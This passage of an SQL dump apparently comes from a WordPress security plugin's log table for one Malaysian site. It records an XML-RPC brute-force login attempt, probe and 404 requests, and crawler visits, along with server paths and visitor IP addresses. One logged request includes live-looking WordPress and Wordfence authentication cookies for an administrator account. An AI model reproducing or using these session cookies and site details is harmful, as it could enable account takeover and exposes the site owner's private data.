08:00:41',17738064,19229184,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(24014,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"43898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9BKmCCaIOMm5l5jJE6awAAAQg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568620842.6266\";s:12:\"REQUEST_TIME\";s:10:\"1568620842\";}}','notice','2019-09-16 08:00:43','2019-09-16 08:00:42',18254920,19552968,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(27339,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"959B9EFD-382A-4F25-B1AA-D389D7475D74\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZF0Hs5PbUdT3M9@C7va9gAAAU0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"50553\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZF0Hs5PbUdT3M9@C7va9gAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569813534.7256\";s:12:\"REQUEST_TIME\";s:10:\"1569813534\";}}','notice','2019-09-30 03:18:58','2019-09-30 03:18:55',35500376,37307888,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.43'),(27340,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.224.220.63\";s:11:\"REMOTE_PORT\";s:5:\"40823\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZGDb85PbUdT3M9@C7vkcQAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569817455.7447\";s:12:\"REQUEST_TIME\";s:10:\"1569817455\";}}','notice','2019-09-30 04:24:17','2019-09-30 04:24:16',35130976,36929768,'https://bintara.com.my/?page_id=18',1,0,'159.224.220.63'),(27341,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/?p=167\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:160:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:24:\"HTTP_AMP_CACHE_TRANSFORM\";s:17:\"google;v=\\\"1..2\\\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:5:\"p=167\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"59161\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZGfzEe1hexcz@z1ysQ3EwAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569824716.4414\";s:12:\"REQUEST_TIME\";s:10:\"1569824716\";}}','notice','2019-09-30 06:25:18','2019-09-30 06:25:17',33979232,34327176,'https://bintara.com.my/?p=167',1,0,'66.249.71.30'),(27342,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZGjvY3U6542i46IOG6fvgAAAEE\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.142.11\";s:11:\"REMOTE_PORT\";s:5:\"42178\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZGjvY3U6542i46IOG6fvgAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569825725.5038\";s:12:\"REQUEST_TIME\";s:10:\"1569825725\";}}','notice','2019-09-30 06:42:07','2019-09-30 06:42:05',34054688,35854168,'https://bintara.com.my/blog/tag/video-conferencing/',1,0,'141.8.142.11'),(27343,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"137-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:46:\"application/json, text/javascript, */*; q=0.01\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:803:\"wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569983026%7CbcqZdr6BH8lN83zVWgxVZD8xlF3bPLVt2D5U6Ed4BIG%7C2cecfb655a71164138c19d6fce75b01dd73a6c208fcdd49f8e68fda8d8022fc1; icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569983026%7CbcqZdr6BH8lN83zVWgxVZD8xlF3bPLVt2D5U6Ed4BIG%7Cfad07427912bad58877a2060413060d6461e6123772c5eaa76435cb2e81fec00; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cbe28572623fab3219f17d21edba9cadd40a1d25a411371539742f29b4974541d; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569832045\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:119:\"https://bintara.com.my/wp-admin/post.php?post=6&action=elementor&elementor-mode=safe&ip-geo-block-auth-nonce=611a7cc805\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"137-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZG@VUe1hexcz@z1ysRM2wAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZG@VUe1hexcz@z1ysRM2wAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"62250\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZG@VUe1hexcz@z1ysRM2wAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569832533.3815\";s:12:\"REQUEST_TIME\";s:10:\"1569832533\";}}','notice','2019-09-30 08:35:35','2019-09-30 08:35:33',35906608,36164456,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'175.142.118.43'),(27526,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZg1n7-TGwg8JtoKWMV@iAAAAAQ\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.158\";s:11:\"REMOTE_PORT\";s:5:\"38555\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZg1n7-TGwg8JtoKWMV@iAAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570256287.7901\";s:12:\"REQUEST_TIME\";s:10:\"1570256287\";}}','notice','2019-10-05 06:18:13','2019-10-05 06:18:08',34388536,36191056,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.142.158'),(27525,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/blog/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZgubb-TGwg8JtoKWMV6NAAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZgubb-TGwg8JtoKWMV6NAAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"39221\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_